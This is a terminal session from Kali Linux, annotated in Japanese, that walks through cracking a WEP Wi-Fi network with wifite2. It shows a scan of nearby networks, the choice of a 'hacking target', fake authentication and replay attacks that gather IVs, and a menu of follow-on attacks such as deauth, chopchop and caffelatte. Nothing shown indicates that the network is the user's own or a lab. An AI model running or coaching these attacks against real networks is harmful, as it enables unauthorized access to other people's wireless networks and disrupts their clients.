┌──(kali__kali)-[~]
└─$ sudo su
sudo: ホスト localhost.localdomain の名前解決ができません: 名前解決に一時的に失敗しました
[sudo] kali のパスワード:
// wifiteを実行します。
┌──(kali__kali)-[/home/kali]
└─# wifite
. .
.´ . . `. wifite2 2.5.8
: : : () : : : a wireless auditor by derv82
`. ` /\ ´ .´ maintained by kimocoder
` / ´ https://github.com/kimocoder/wifite2
[!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
[!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
[!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
[+] Using wlan0mon already in monitor mode
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ----- ----- ---- ------
1 x-xx-2G 1 WPA-P 51db no
2 xxxxx-xxxxxx-g 7 WPA-P 43db no
3 xxxxx-xxxxxx-gw 7 WEP 43db no
[+] Scanning. Found 3 target(s), 3 client(s). Ctrl+C when ready
------------------------------------------------
[+] Scanning. Found 3 target(s), 3 client(s). Ctrl+C when ready
// Ctrl+Cで停止させます。
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ----- ----- ---- ------
1 x-xx-2G 1 WPA-P 51db no
2 xxxxx-xxxxxx-g 7 WPA-P 43db no
3 xxxxx-xxxxxx-gw 7 WEP 43db no
[+] Scanning. Found 3 target(s), 3 client(s). Ctrl+C when ready ^C
// ハッキング対象のESSIDの番号を入力します。(例:3)
--- ------------------------- --- ----- ----- ---- ------
NUM ESSID CH ENCR POWER WPS? CLIENT
1 x-xx-2G 1 WPA-P 51db no
2 xxxxx-xxxxxx-g 7 WPA-P 43db no
3 xxxxx-xxxxxx-gw 7 WEP 43db no
[+] select target(s) (1-3) separated by commas, dashes or all: 3
// 解析が始まります。
[+] (1/1) Starting attacks against FF:FF:FF:FF:FF:FF (xxxxx-xxxxxx-gw)
[+] attempting fake-authentication with FF:FF:FF:FF:FF:FF... success
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 0/10000 IVs, no-auth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (40db) WEP replay: 1/10000 IVs, no-auth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 1/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 17/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 17/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (40db) WEP replay: 18/10000 IVs, fakeauth, Waiting for packet...
[!] restarting aireplay after 11 seconds of no new IVs
[+] xxxxx-xxxxxx-gw (40db) WEP replay: 18/10000 IVs, fakeauth, Waiting for packet...
:
:
// 解析できなかった場合、解析プログラムを変更するためにCtrl+Cで停止させます。
[+] xxxxx-xxxxxx-gw (41db) WEP replay: 10251/10000 IVs, fakeauth, Waiting for packet... and c
[+] xxxxx-xxxxxx-gw (41db) WEP replay: 10251/10000 IVs, fakeauth, Waiting for packet... and c
[+] xxxxx-xxxxxx-gw (42db) WEP replay: 10251/10000 IVs, fakeauth, Waiting for packet... and cracking^C
// 解析プログラムの一覧が表示されます。
[!] Interrupted
[+] Next steps:
1: Deauth clients and retry replay attack against xxxxx-xxxxxx-gw
2: Start new fragment attack against xxxxx-xxxxxx-gw
3: Start new chopchop attack against xxxxx-xxxxxx-gw
4: Start new caffelatte attack against xxxxx-xxxxxx-gw
5: Start new p0841 attack against xxxxx-xxxxxx-gw
6: Start new hirte attack against xxxxx-xxxxxx-gw
7: Stop attacking, Move onto next target
[?] Select an option (1-7):